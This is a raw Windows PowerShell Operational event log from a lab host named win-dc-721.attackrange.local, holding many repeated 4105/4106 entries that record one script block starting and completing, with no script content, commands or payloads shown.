Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471335
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471334
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471333
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471332
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471331
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471330
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471329
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471328
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471327
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471326
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471325
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471324
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471323
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471322
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471321
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471320
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471319
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471318
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471317
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471316
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471315
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471314
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471313
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471312
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471311
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471310
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471309
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471308
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471307
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471306
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471305
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471304
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471303
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471302
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471301
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471300
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471299
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471298
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471297
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471296
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471295
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471294
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471293
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471292
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471291
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471290
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471289
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471288
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471287
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471286
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471285
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471284
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471283
Keywords=None
Message=Completed invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1471282
Keywords=None
Message=Started invocation of ScriptBlock ID: ceffd99c-52ec-41f8-bd87-c1527d0f951d
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1471281
Keywords=None
